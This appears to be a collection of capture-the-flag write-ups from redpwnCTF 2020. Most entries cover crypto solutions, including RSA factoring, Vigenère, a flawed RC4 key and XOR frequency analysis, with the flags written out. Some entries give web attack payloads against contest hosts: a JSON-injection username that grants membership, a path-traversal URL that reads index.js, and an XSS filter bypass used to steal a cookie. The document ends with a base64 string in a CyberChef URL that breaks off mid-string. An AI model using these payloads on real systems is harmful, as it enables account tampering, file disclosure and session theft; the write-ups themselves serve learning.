factordb go brrr

calc d

flag{t0000_m4nyyyy_pr1m355555}

Public Key:

n: 5028492424316659784848610571868499830635784588253436599431884204425304126574506051458282629520844349077718907065343861952658055912723193332988900049704385076586516440137002407618568563003151764276775720948938528351773075093802636408325577864234115127871390168096496816499360494036227508350983216047669122408034583867561383118909895952974973292619495653073541886055538702432092425858482003930575665792421982301721054750712657799039327522613062264704797422340254020326514065801221180376851065029216809710795296030568379075073865984532498070572310229403940699763425130520414160563102491810814915288755251220179858773367510455580835421154668619370583787024315600566549750956030977653030065606416521363336014610142446739352985652335981500656145027999377047563266566792989553932335258615049158885853966867137798471757467768769820421797075336546511982769835420524203920252434351263053140580327108189404503020910499228438500946012560331269890809392427093030932508389051070445428793625564099729529982492671019322403728879286539821165627370580739998221464217677185178817064155665872550466352067822943073454133105879256544996546945106521271564937390984619840428052621074566596529317714264401833493628083147272364024196348602285804117877
e: 65537
c: 3832859959626457027225709485375429656323178255126603075378663780948519393653566439532625900633433079271626752658882846798954519528892785678004898021308530304423348642816494504358742617536632005629162742485616912893249757928177819654147103963601401967984760746606313579479677305115496544265504651189209247851288266375913337224758155404252271964193376588771249685826128994580590505359435624950249807274946356672459398383788496965366601700031989073183091240557732312196619073008044278694422846488276936308964833729880247375177623028647353720525241938501891398515151145843765402243620785039625653437188509517271172952425644502621053148500664229099057389473617140142440892790010206026311228529465208203622927292280981837484316872937109663262395217006401614037278579063175500228717845448302693565927904414274956989419660185597039288048513697701561336476305496225188756278588808894723873597304279725821713301598203214138796642705887647813388102769640891356064278925539661743499697835930523006188666242622981619269625586780392541257657243483709067962183896469871277059132186393541650668579736405549322908665664807483683884964791989381083279779609467287234180135259393984011170607244611693425554675508988981095977187966503676074747171

vigenere cipher.

Testing different keys gives redpwwwnctf from iigesssaemk

decrypt z_jjaoo_rljlhr_gauf_twv_shaqzb_ljtyut

to get...

flag{i_guess_pseudo_keys_are_pseudo_secure}

So all the code does is just add 2 until its a prime (repeated up to 255 times) This means that the primes are fairly close and could be easily brute forced (file included)

Then calc d

flag{pr1m3_pr0x1m1ty_c4n_b3_v3ry_d4ng3r0u5}

Starting from the top as 0, represent each colour as a base12 digit to get 86908187A349994397974192497B41977B44927B449698A5.

Then convert from base12 each 2 chars to get flag:

flag: flag{9u3ss1n9_1s_4n_4rt}

the rc4 alg is perfect and works as intended however the key gen is flawed

def generate_key():
    key = [KeyByteHolder(0)] * 8 # TODO: increase key length for more security?
    for i, c in enumerate(take(flag, 8)): # use top secret master password to encrypt all passwords
        key[i].num = c
    return key

As you can see in python it multiplies the key by 8 which from when i learned from making my maze alg, means changing one val changes all of the others at the same time. this creates a key thats 8 repeats of the same char. i brute forced this and checked it to get the correct char.

the output gives repeat of fptdics_htaopps}ysnnp{idtsltu_idr_aoug_iy and creates

flag{crypto_is_stupid_and_python_is_stupid}

Brief

The aliens are at it again! We've discovered that their communications are in base 512 and have transcribed them in base 10. However, it seems like they used XOR encryption twice with two different keys! We do have some information:

• This alien language consists of words delimitated by the character represented as 481

• The two keys appear to be of length 21 and 19

• The value of each character in these keys does not exceed 255

• Find these two keys for me; concatenate their ASCII encodings and wrap it in the flag format.

481 is probably going to be the most common number, as this is the alien word delimiter. We can use this to execute a frequency attack.

The lowest common multiple of 21 and 19 is 399. The alien message was XORed with the 21 length key, and then the 19 length key. Because of how xor works, message XOR first key XOR second key = message XOR (first key XOR second key)

Therefore, if we stack the two keys against each other, and XOR (that is 21 19-length key XOR 19 21-length key) we get an "ultra-key" of length 399.

How can we derive this key? Frequency analysis, of course.

If we take every 399th number with different starting points(like nums[0::399], nums[1::399], etc.) then the subset of numbers we get from this will all be XORed with the same value!

This means we can get these subsets and run frequency analysis on them separately. The most common number is bound to be 481, so we can run freq analysis on these subsets, and the most common number will be 481 xored with the respective element of the "ultra-key". Using this, we can leak the ultra-key.

Now what? We've got 21 19-length key XOR 19 21-length key. Since ultimately this is to become a flag, courtesy of will, we can reduce the possible chars in each key to qwertyuiopasdfghjklzxcvbnmmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_,.'?!@$<>*:-"

So...

We can generate a "mapping". By XORing every possible pair of chars in our alphabet, we can generate a mapping of possible values to the pair of characters that matches.

Then, we can significantly reduce the amount of possible chars we have for one key. We started with the 19-length key. Again, getting every 19th char starting at different starting points, we can get one char of the key XORed with lots of different other, PRINTABLE AND IN THE ALPHABET, values.

Essentially, for each character of the key, we can create a list of possible numbers such that every number is char xor K for some PRINTABLE AND IN THE ALPHABET K.

From there, we can use the alphabet as a whitelist for possible chars in one position of the key.

If it's impossible to xor a char and another char in the alphabet to get a certain number in the subset we create, then we know that char of the key can NOT be that.

Using a search like so,

import string
import itertools
from Crypto.Util.strxor import strxor
def getfreqs(numbers):
    counts = {number: numbers.count(number) for number in set(numbers)}
    return counts
def getmax(freqs):
    return max(freqs.keys(), key=freqs.__getitem__)
def xor(b1,b2):
    return bytes(byte1 ^ byte2 for byte1,byte2 in zip(b1,b2))
with open("encrypted.txt") as f:
    lines = f.readlines()
    nums = [int(x) for x in lines]
common = 481
leakedkey = []
for i in range(399):
    subset = nums[i::399]
    freqs = getfreqs(subset)
    maximum = getmax(freqs)
    leak = maximum ^ common
    leakedkey.append(leak)
print(bytes(leakedkey))
mapping = {}
for pair in itertools.combinations_with_replacement("qwertyuiopasdfghjklzxcvbnmmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_,.'?!@$<>*:-",2):
    mapping[pair] = strxor(pair[0].encode(),pair[1].encode())[0]
print(mapping)
for i in range(21):
    subset = leakedkey[i::21]
    subset = list(filter(lambda x: x != 0,subset))
    possibles = list("qwertyuiopasdfghjklzxcvbnmmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_,.'?!@$<>*:-")
    for num in subset:
        for char in possibles:
            found = False
            for key in mapping:
                if mapping[key] == num:
                    if char in key:
                        found = True
            if not found:
                possibles.remove(char)
    print(possibles)

We can reduce the 19-length key to all of it's possible values in each position, getting:

['X', '_']
['t', '*']
['h', 'm']
['3', '6']
['X', '_']
['5']
['3']
['f', 'c']
['0']
['k', 'n', '0']
['d', 'c']
['Z', '_']
['1', '6']
['2', '5', '*']
['X', '_']
['t']
['o', 'h', 'm']
['1', '6']
['2', '5']

we could use more frequency analysis to enumerate from there, but it's clear that this is going to be _th3_53c0nd_15_th15

From there, we simply XOR _th3_53c0nd_15_th15 back with our ultra-key to get the first part of the flag, h3r3'5_th3_f1r5t_h4lf

Flag: flag{h3r3'5_th3_f1r5t_h4lf_th3_53c0nd_15_th15}

Theres a flaw in code that means every nth bit results in 1,

which can be unxored later [used primes for efficiency - doesnt repeat bit]

import socket
host = "2020.redpwnc.tf"
port = 31284
ip = "35.231.164.133"#socket.gethostbyname(host)
def crack():
    template = [x for x in "-"*500]
    for i in primes: # use ur own primes
        a = server(i-1,i)
        for k,l in enumerate(str(a)):
            if k%(i) == 0:
                template[k] = str(int(l) ^ 1)
        print("".join(template))
def server(i,j):
    s = socket.socket()
    s.connect((ip, port))
    a = s.recv(1024)
    print(a,i)
    s.send((str(i)+"\n").encode())
    a = s.recv(1024)
    print(a,j)
    s.send((str(j)+"\n").encode())
    out = s.recv(1024).decode().split(" ")[1]
    print(out)
    return out
crack()

get every 7 bytes to get...

flag{bits_leaking_out_down_the_water_spout}

Just pasted xss filter bypasses until one gave an alert('xss'), then refined it to send us the cookie.

(HTTPS was required)

flag{wh0_n33d5_d0mpur1fy}

So, for this challenge, we need to set the "member" parameter in the json to something that is not 0, ideally 1. idk all the techincal stuff but i just tried to inject stuff into the json Since we still need valid json for it to work, I first gave the name a junk value, and then closed the quote, created a new member parameter, gave it the value 1, and then finally created a random parameter with a junk value to make sure it was valid json. Final payload (just use this as a username) hi","member":1,"hi":"hi

which gets you the flag: flag{t0ny_5uck5_47_w3b_l0l}

Flag: flag{1_c4nt_f1nd_4_g00d_p4nd4_pun}

There are two checks made to the page parameter:

1. If the first char is not alphanumeric, remove it, and keep removing until an alphanumeric char is found

2. If the string "../" (and basically all variants, url encoding etc.) are present, replace them with nothing, and keep replacing until none are left.

We can bypass this by having a decoy path parameter as something random (as long as its not an actual dir i think its fine), and then having an "&&path=" to add another path variable, which is unfiltered.

Therefore, our final payload becomes:

https://tux-fanpage.2020.redpwnc.tf/page?path=a&&path=/../../index.js

which gets us our flag!

Flag: flag{tr4v3rsal_Tim3}

Use Cyberchef, base64 decode 25 times.

Flag: flag{l00ks_l1ke_a_l0t_of_64s}

Cyberchef URL:

https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)&input=Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll5U2tWVWJHaG9UVlZ3VlZadGNFSmxSbGw1VTJ0V1ZXSkhhRzlVVmxaM1ZsWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVm14YU0xWnNXbUZrUjA1R1UyMTRVMkpIZHpGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm0xNFlVMHhXbk5YYlVaclVqQTFSMVV5TVRSVk1rcElaSHBHVjFaRmIzZFdha1poVjBaT2NtRkhhRk5sYlhoWFZtMHhORmxWTUhoWGJrNVlZbFZhY2xWcVFURlNNVlY1VFZSU1ZrMXJjRWxhU0hCSFZqRmFSbUl6WkZkaGExcG9WakJhVDJOdFJraGhSazVzWWxob1dGWnRNSGhPUm14V1RVaG9XR0pyTlZsWmJGWmhZMnhXY1ZGVVJsTk5WbFkxVkZaU1UxWnJNWEpqUld4aFUwaENTRlpxUm1GU2JVbDZXa1prYUdFeGNHOVdha0poVkRKT2RGSnJhR2hTYXpWeldXeG9iMWRHV25STlNHaFBVbTE0VjFSVmFHOVhSMHB5VGxac1dtSkdXbWhaTW5oWFkxWkdWVkpzVGs1V2JGa3hWa1phVTFVeFduSk5XRXBxVWxkNGFGVXdhRU5UUmxweFVtMUdVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS1QyUkdTbkpoUjJoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxOSGFGQlZiVEUwVmpGU1ZtRkhPVmhTTUhCNVZHeGFjMWR0U2tkWGJXaGFUVlp3YUZwRlpGTlRSa3B5VGxaT2FWSnRPVE5XTW5oWFdWWlJlRmRzYUZSaVJuQnhWV3hrVTFsV1VsWlhiVVpPVFZad2VGVXlkREJXTVZweVkwWndXR0V4Y0ROV2FrWkxWakpPU1dKR1pGZFNWWEJ2Vm10U1MxUXlUWGxVYTFwb1VqTkNWRmxZY0ZkWFZscFlZMFU1YVUxcmJEUldNalZUVkd4a1NGVnNXbFZXYkhCWVZHdGFWbVZIUmtoUFYyaHBVbGhDTmxkVVFtRmpNV1IwVTJ0a1dHSlhhR0ZVVnpWdlYwWnJlRmRyWkZkV2EzQjZWa2R6TVZZeVNrZGhNMmhYWVRGd2FGWlVSbFpsUm1SMVUyczFXRkpZUW5oV1YzaHJUa2RHUjFaWVpHaFNWVFZWVlcxNGQyVkdWblJOVldSV1RXdHdWMWxyVW1GWFIwVjRZMGhLV2xaWFVrZGFWV1JQVTBVNVYxcEhhR2hOU0VKMlZtMTBVMU14VVhsVmEyUlVZbXR3YjFWcVNtOVdSbXhaWTBaa2JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa2Q0YTFOR1ZuTlhiRlpYWWtoQ1NWWkdVa2RWTVZwMFVtdG9VRll5YUhCVmJHaERUbXhrVlZGdFJtcE5WMUl3VlRKMGExZEhTbGhoUjBaVlZucFdkbFl3V25KbFJtUnlXa1prVjJFelFqWldhMlI2VFZaa1IxTnNXbXBTVjNoWVdXeG9RMVJHVW5KWGJFcHNVbTFTZWxsVldsTmhSVEZ6VTI1b1YxWjZSVEJhUkVaclVqSktTVlJ0YUZOaGVsWlFWa1phWVdReVZrZFdXR3hyVWtWS1dGUldXbmRsVm10M1YyNWtXRkl3VmpSWk1HaExWMnhhV0ZWclpHRldWMUpRVldwS1MxSXlSa2hoUlRWWFltdEtNbFp0TVRCVk1VMTRWVzVTVjJFeVVuRlZiR1EwVm14c2MxcEhPVmRTYkVwWlZHeGpOVll4V25OalJXaFlWa1UxZGxsV1ZYaFhSbFoxWTBaa1RsWXlhREpXTVZwaFV6RkplRlJ1VmxKaVJscFlWRlJHUzA1c1draGxSMFphVmpGS1IxUnNXbUZWUmxwMFZXNUNWMkpIYUVSVk1WcGhZMVpPY1ZWc1drNVdNVWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp1Y0Zka2JGbDNWMjVLYkZKdFVubFhhMXByVmpKRmVsRnFXbGRoTWxJMlZGWmFXbVZXVG5KYVIyaE9UVzFvV1ZkV1VrZGtNa1pIVjJ4V1UySkdjSE5WYlRGVFRWWlZlV042UmxoU2EzQmFWVmMxYjFZeFdYcGhTRXBWWVRKU1NGVnFSbUZYVm5CSVlVWk9WMVpHV2xkV2JHTjRUa2RSZVZaclpGZGliRXBQVm14a1UxWXhVbGhrU0dSWFRWZDRlVlpYTVVkWFJrbDNWbXBTV2sxSGFFeFdNbmhoVjBaV2NscEhSbGRXTVVwUlZsUkNWazVXV1hoalJXaG9VakpvVDFVd1ZrdE5iRnAwVFZSQ1ZrMVZNVFJXVm1oelZtMUZlVlZzVmxwaVdGSXpXV3BHVjJOV1RuUlBWbVJUWWxob1lWZFVRbUZoTWtwSVUydG9WbUpIZUdoV2JHUk9UVlpzVjFaWWFGaFNiRnA1V1ZWYWExUnRSbk5YYkZaWFlUSlJNRlpFUms5VFJrcHlXa1pLYVZKdVFuZFdiWFJYVm0xUmVGZHVVbXBTVjFKWFZGWmFkMDFHVm5Sa1J6bFdVbXh3TUZsVldsTldWbHBZWVVWU1ZXSkdjR2hWTUdSWFUwWktkR05GTlZkTlZXd3pWbXhTUzAxSFJYaGFSV2hVWWtkb2IxVnFRbUZXYkZwMFpVaGtUazFYZUZkV01qVnJWVEpLU1ZGcmFGZFNNMmhVVmxSS1JtVnNSbkZXYkdSVFRUSm9iMVpyVWt0U01WbDRWRzVXVm1KRlNsaFZiRkpYVjFaYVIxbDZSbWxOVjFKSVYydGFhMWRIU2taalNFNVdZbFJHVkZwWGVITldiR1J6Vkcxb1YyRXpRWGhXVm1NeFlqRlplRmRZY0doVFJYQllWbXRXWVdWc1duRlNiR1JxVFZkU2VsbFZaSE5XTVZwMVVXeEdWMkV4Y0doWFZtUlNaVlphY2xwR1pGaFNNMmg1VmxkMFYxTXhaRWRWYkdSWVltMVNjMVp0TVRCTk1WbDVUbGQwV0ZKcmJETldiWEJUVjJzeFIxTnNRbGRoYTNCSVdUSjRhMk50VmtkYVIyaG9UVEJLVWxac1VrZGhNVTE0VTFob2FsSlhVbWhWYlhNeFYwWlpkMVpyZEU1aVJuQXdWRlpTUTFack1WWk5WRkpYVm0xb2VsWnNXbXRUUjFaSFYyeHdWMUpXYjNwWFYzQkhWakpPVjFWdVNsVmlSMUpVV1d4b2IwNVdXblJOUkVab1RWWnNORll5TlU5aGJFcEdVMjFvVjJKSFVrOVVWbHBoVjBkTmVtRkdhRk5pUm05NFYxUkNZV0V4VW5OWFdHeG9Va1Z3V0ZsWGRFdGpiRlkyVW10MGFtRjZWbGhYYTFwaFlWWktjMk5HYkZkU2JFcE1XV3BHVDFZeFpISmhSM2hUVFVad1dWWkdaRFJUTVU1WFYyeG9hMUo2Ykc5VVZsWnpUbFpzVm1GRlRsZGlWWEJKV1ZWV1QxbFdTa1pYYldoYVpXdGFNMVZzV2xka1IwNUdUbFprVGxaWGQzcFdiWGhUVXpBeFNGSllhR0ZTVjJoVldXdGtiMkl4Vm5GUmJVWlhZa1p3TVZrd1dtdGhNa3BIWWtST1YwMXFWbEJXUkVwTFVtMU9TV05HYUdoTmJFbDZWMVphWVZReFNuTlVia3BwVW0xU1QxbHRlRXRsVm1SWlkwVmtWMkpXV2xoV1J6VlhWa2RLUjFOdVFsZGlSbkF6VmpGYVlWSXhiRFpTYld4T1ZqRktTVll5ZEdGaE1XUklVMnRhYWxORk5WZFpiRkpIVmtad1dHVklUbGRpUjFKNlZrY3hiMVl5UlhwUldHaFhWbTFSTUZwRVJscGxWazV6WWtaYWFWSXlhRzlXVjNSWFdWWnNWMk5HV21GU1dGSlZWbTF6TVdWc2JGWmFSemxWWVhwR1Yxa3dXbXRXTWtwSVZHcFNWV0V5VWxOYVZscGhZMnh3UjFwR2FGTk5NbWcxVm14a2QxRXhiRmhVYTJSWFlteEtjMVV3WkZOak1XeHlWMjVPVDFadVFsZFpWV1F3VjBaS2NtSkVUbGRpV0VKVVZqSnplRkl4VG5OUmJHUk9ZV3RhU0Zkc1dtRldNazV6WTBWb1UySkhVazlVVnpGdlUyeFplRlZyY0d4U2F6RTBWVEZvYzFVeVJYbFZiVGxXWWxob1RGWnJXbUZqTWtaR1ZHeFNUbFp1UVhkV1JscFRVVEZhY2sxV1drNVdSa3BZV1d0a2IyUnNXWGRYYlhSVVVqQmFTRmxyV25kaFZtUklZVWM1VjJKWVFraFpla3BPWlVkT1JtRkdRbGRpVmtwVlYxZDRiMkl4YkZkYVJsWlNZbFZhYjFSWGRIZFRWbFY1WkVjNVYySlZjRWxhVldSdlZqSktTRlZyT1ZWV2JIQjZWbXBHWVZkWFJrZGhSazVwVW01Qk1WWXhXbGRaVjBWNFZXNVNVMkpyTlZsWmExcGhWMFpzVlZOc1NrNVNiWGhXVlcxek5WVXdNVmRqUkVaWFVqTm9kbGxXV2t0ak1rNUhZa1pvVjAweFNqSldWbEpIVkRGWmVGcElTbUZTYkhCdlZGZDRTMWRHV2tkWGJVWnJUVVJHU0ZadE5WTmhNVW8yWWtaa1ZtSllhSHBVYkZwelZtMUdSbFJzWkdsV1dFSktWMVpXVjFVeFdsaFRiR3hvVTBWd1dGbHJXbmRUUm5CR1YydDBhMUl3TlVkVWJGcHJWR3hhV0dRemNGZGlXR2hVVlhwQmVGTkdTbGxoUjBaVFZqSm9WbGRYZEd0aU1rbDRWbTVHVW1KVldsaFphMXAzVFZacmQxZHRkR2hOYTNCSVdXdFNUMVl3TVhGV2EzaGFZVEZ3VEZwRldsZGtWMHBIWVVkb1RsZEZTalZXYlRGM1V6RktkRlp1VGxOaWExcFpXV3RrVTJJeFVsaGxSWEJPWWtad1NGWXlNVWRYUjBwWFVtcE9WVlpzY0hKV01HUkxWMGRXU1ZSc2NGZFNWbTk2Vm1wR1lXRXhaRWhXYTJoUVZtdHdUMVp0ZEhkVFZscHpXWHBHVkUxWFVrbFZNblJoWVd4T1JrNVdaRnBpUmtwSVZtdGFkMWRIVmtsVWJHUnBVakZLTmxaclkzaGlNVmw1VWxod1VsZEhhRmhXYlRGT1pVWnNjVkpzY0d4U2JWSmFXVEJrYjFaR1NsbFJiR3hYWWxoU1dGZFdaRmRqTVdSMVVteE9hVkl4U25oV1JscHJWVEpXYzJKR1dtRlRSVFZZVkZaYWQwMVdWbGhsUldSWFRXdFdORmt3Wkc5WFJscDBWV3hPWVZac2NHaFpNbmgzVWpGd1IyRkdUazVOYldjeFZtMTRhMDFHV1hoVVdHaGhVbGRTVjFsclpGTlhWbXgwVFZaT2FrMVdjREJVVmxKRFZHc3hWMkpFVmxWaVIxRjNWakJhUzJOdFNrVlViR1JwVjBWS1ZWWnFTbnBsUmtsNFZHNU9VbUpIVW05WlZFNURVMVprVlZOcVVtaE5helV3Vm0xMGExbFdTWGxoUnpsVlZrVktURlpYZUdGak1WWnlXa2RvVGxaVVJUQldWRVp2WWpKR2MxTnNhRlppVjJoWFdXeG9UbVZHV1hkWGJIQnJUVlp3ZVZwRlZURmhWa3AxVVZoa1YxSnNjRlJWVkVaaFkyc3hWMWRyTlZkU2EzQlpWbTB3ZUdJeVZuTlhiazVZWWxoU1ZWVnFSbUZUUmxsNVpVaGtWMDFWY0ZoWmFrNTNWMFpaZWxGcmFGZGhhM0JRVm1wR1YyUldUbk5XYld4VFRWVndWbFl4WkRSaU1rbDRZa1prWVZKc1dsTlpiRlpoWWpGU1YxcEdUbFJTYkd3MVZHeFZOV0ZIU2taalJFSmhWbGRTU0Zac1dtRldNazVIV2taV1YySklRalpXYlhCSFdWWmtXRkpyYUdwU01uaFlWakJXUzFOR1duUmxSM1JQVWpCV05GWlhOVTlYUm1SSVpVYzVWbUV4V2pOV01GcFRWakZrZFZwSGFGTmlSbXQ1VmxjeE1HUXlTa2RUYms1VVlXdGFXRlZ1Y0VkVFJscFZVMnQwVTAxck5VaFphMXB2VmpBd2VGTnRPVmhoTVVwRFZGWmtUbVZHY0VsVGJXaFRUVEpvVlZaR1ZtRmtNa1pIVjI1U1RsTkhhRmRVVmxaelRrWmFXRTVWT1ZoU01IQlhWako0YTFadFNsbGhSRTVWVmxad2VsWnRlR3RqTVZKeldrWmthVk5GU21GV01WcFhWakZWZUZkdVNrNVhSbHB2VldwS2IxbFdjRmhrUjBaT1RWWmFlbFl5ZUd0aE1VbDNUbFZrVldKR2NISldSM2hoVjBkUmVtTkdaR2xYUjJoVlZsaHdRbVZHVGtkVWJHeHBVbXMxYjFSWGVFdFdiR1JZVFZod1RsWnNjRmhaYTJoTFdWWktObUpHYUZwaE1YQXpXbGQ0V21WVk5WaGtSbFpvWld0YVdWZFVRbTlqTVZsM1RWaEdVMkV5YUdGV2FrNXZZVVpyZVdONlJsaFdNSEJJV1ZWa2IxUnNaRVpUYkVwWFRWWndhRmRXV2s1bFZsSjFWV3hXYUUxV2NGcFhWM1JyVlRKSmVGVnNhR3BsYTBwUFZXMHhVMWRzYTNkV2JYUlhUV3R3V0ZZeWVHOVdNVW8yVm14b1YyRXlVa3hWYWtaUFpGWkdjMXBIYkZOaWEwWTJWbTF3UjFsV2JGZFRXR2hwVWtad1ZGbHNaRFJVTVZweFVtdDBWRlpzYkRWYVJXUkhZVVV4V0ZWcmJGWk5ibEpvV1ZkNFQxSnJOVmRhUm5CcFVtdHdTVlp0ZEdGa01XUklWbXRzVldKSFVuQlZha1pMVG14YWNsa3phR2xOVm13MVZXeG9kMVZzWkVoaFJtaFhZbFJHVTFSVlduZFNWa3B6WTBkNFYyRjZWalpYVjNSaFdWZEdWMU5ZYkdoU2VteFlWbXBPVTFkR1pGZFhiazVYVFdzMVNGWXlNVWRWTVdSSFUyeGFWMkpVUmpaVVZtUlhZekpLUjFkdFJsTmxiWGhYVjFab2QxSXhXWGhoTTJSWVlsVmFXRlJYZEhkVFZscElZMFpPVjFZd1ZqVldWM2hQV1ZaYWMyTkhhRnBOYm1nelZXcEdkMUl5UmtkVWF6Vk9ZbGRqZUZadE1UUmhNbEY0VWxob2FWSnRhRlpaVkVwVFYwWnNkR1ZGZEdwTlZsWXpWMnRhVDJGck1WaGxTR3hYVFc1b2NsWkVSbUZrVmtaeldrWndWMVl4UmpOV2FrSmhVMjFSZVZScldtaFNia0pQVlcwMVEwMXNXbkZUYm5Cc1VtczFTVlZ0ZEdGaVJrcDBWVzA1V2xaRldqTlpha1poVjBVeFZWVnRhRTVoZWxWM1ZtMHhNR0V4YkZkVFdHeG9VbnBzVmxaclZrdFVSbHBZWlVkR2FrMVdXbmxYYTJSdlZHeGFWVkpVUWxkV1JWcDJXV3BLUjJNeFRuTmhSbHBwVmpKb1dGZFhlRzlVYlZaSFYxaGtXR0pJUW5KVVZscDNaVlp3UmxaVVJtaFdhM0F4VlZab2ExWXhTbk5qUmxKV1ZrVmFhRmt5YzNoV01XUnlUbFprVTJFelFscFdiVEIzWlVkSmVWWnVUbGhpYkVwUFZteGFkMk14V25SbFIwWnNZa1p3TUZwVmFHdGhSbHAwVld0b1ZrMVhhRE5XTUZwaFl6RmtkR0ZHWkdoaE0wSlZWbGN4ZW1WR1dYbFNhMlJTWWtkU1QxUlZWbmRXYkZsNFdrUkNhVTFWVmpOVWJGWnJWMGRLY21OSFJsVldSWEJVVmxWYVlXUkhWa2xVYXpsVFlrZDNNVlpIZUdGVU1WbDVVMnhhYWxKWGVHRldiRnAzWkd4YWNWTnJaR3BoZWxaWFZERmFWMVl5U2tsUmJUbFhZV3RLY2xaSE1WZGtSa3B5V2tkb1UyRjZWbmRXVnpBeFVXc3hWMWRZYUZoaVIxSmhWbXBDVjA1R1dsaE9WazVXVFd0d2VWUnNXbk5YYlVWNFkwZG9WMDFHY0hwV2JGcFBZekZPY2s1V1RtbFdhM0JhVm0xd1MwMUZNVWhTYmtwT1ZtMVNWVmxYZEdGWFJsWjFZMFZrYTJKR2NGWlZNblF3VlRBeGNrNVZhRnBoTVhCMlZtcEJkMlZYUmtoUFZtUlhaV3RKTUZac1kzaFdNVWw0WTBWc1YySkZOWEJWYkdoRFpERmFkR1ZIUm10TmExcElWakkxVTFSc1RraGhSbVJWVm14VmVGWXdXbHBsVjFaSVQxZG9UbFpYT0hsWFYzUnFUbFphVjFkdVRsaGhhelZXVm14YWQyVnNXblJsUjNScVRWWktlbGRyV210aFZrNUdVMjFHVjAxV2NGaFdha1pXWlVaa2RWTnJOVmhTYkhCMlZsZHdTMkl4YkZkalJtaHJVakJhVDFSV1dtRmxiRmw1WlVkMGFFMVZiRE5VYkZaclZsZEtSMk5JU2xkU00yaG9WakJrVW1WdFRrZGFSMnhZVWpKb1ZsWnNhSGRSYlZaSFZHdGtWV0pIZUhCVmJYTXhZakZTV0dWRmRGZGlSMUpaVkZab2QxUnNXbk5qUm1oYVlUSm9URmRXV2t0T2JVcEhZVVp3YUUxWVFYcFhiR1EwVjIxV1ZrNVdhR3RTYkZwdldsZDBZVmRXWkZWUmJUbHFUVlpzTTFSV2FFZFZNa1Y1WVVkR1YyRnJOWFpaVlZweVpWVXhWazlXVGxkaE0wSTJWMVpXYTJJeFVuTmFSVnBVWWtWd1dGbHNVa2ROTVZZMlVtdDBhMUpzY0hsWlZWcFhZVVV4VjJOR2JGaFdNMUp5VmxSR1lWSXhXblZVYkdocFlsWktlbFp0TUhoVk1XUnpZVE5rVjJKWVVsaFVWM1IzVjBaV2RHTkZPVmRXYkhCNlZqSTFkMWRzV25OalJYUmhWbTFTU0ZWcVJsZGpNazVJWWtaT1RtSlhaRFZXYlRGM1VqRnNXRkpZYUdGU1YyaFlXVlJLYjFWV1duUmtTR1JWVFZad01GcEZhR3RXUmxwelkwaHdXRmRJUWtoV2ExVjRWMFpXY21KR1drNWliRXB2VjFaa05GUXhTbkpPVm1SaFVtNUNjRlZ0ZEhkVFZscDBaRWRHYTAxWFVrbFdiWFJ6VmxkS1NGVnVRbFpoYTFwTVZHMTRZV05zYTNwaFIyeE9WbXhaTUZacVNqQlpWbVJJVW01T2FsSnRhRmhaVkVaaFpWWndWbGR1VG1wV2EzQjZXVEJrTkZVeVNsZFRhbEpYWVd0dk1GVjZTa2RUUms1eVYyMXdVMkpXU2xwV2JURTBVekZTUjFkc1ZsTmhlbXhVVkZaYWQwMVdWblJsUlRsb1ZteHdXRmt3V25kV01rcFZVVmhvVmxaRldsQldha3BMVWpGa2MyRkhhR3hpV0doYVZtdGFZVmxYVVhoVWEyUllWMGQ0YzFWcVFtRlhSbEpZWkVoa1ZGWnNjRWxaTUZwUFZqRlpkMVpxVmxkV00yaFFWMVphWVdNeVRraGhSbkJPWW0xbmVsWlhjRWRrTVVsNVVtdGtWV0Y2Vms5WmJHUnFaVVphZEUxVVVtaE5iRVkwVmxab2IxWXhaRWhsUmxaWFRVZFNkbGt3V2xaa01WcFZVbXhvVTJKWVozZFdSbHBoVkRGa1IxTnVUbFJpUjJoWVZGZHdWMk5zV2tobFJYUnJVakZLUmxaSGVHOWhSVEZYWTBoc1YyRnJTbWhWTWpGU1pWWlNjbGR0YUZOaWEwcFFWbGN3TVZFd01YTlhia1pVWW01Q2MxVnRjekZUUmxwMFRsWmtXRkl3Y0VsV1YzTTFWMjFLVlZKdVdscGhhMXBvV1RGYVIyUkdTbk5hUlRWb1pXeFpNbFl4VWtOV01rbDRWbGhzVkdFeWFGZFphMlJ2Vm14YWRHVkhSazVOVm5CWldsVmtSMkZyTVZkWGJteFhVak5vY2xsVlpGZGpNV1J6WWtaa2FHRXhjREpYVjNCTFVqSk5lRlJ1VG1oU01taFVXbGN4TkZkR1pGZGFSRUpyVFd4S2VsWXlkRmRWTWtwSFkwaEtWVlpzY0ROYVZscDNVbXhhVlZKdGFGZGhNMEY0VmxaYWIyRXhXWGhUYms1cVVteEtWMVpyVm1GaFJtdDVZek5vVjAxWFVubFViRnByVlRKRmVsRnNjRmRpVkVJeldsVmtTbVZXV25WVWJHaHBZa1Z3VUZadGVHRmtNazE0VjI1U2JGSXdXbk5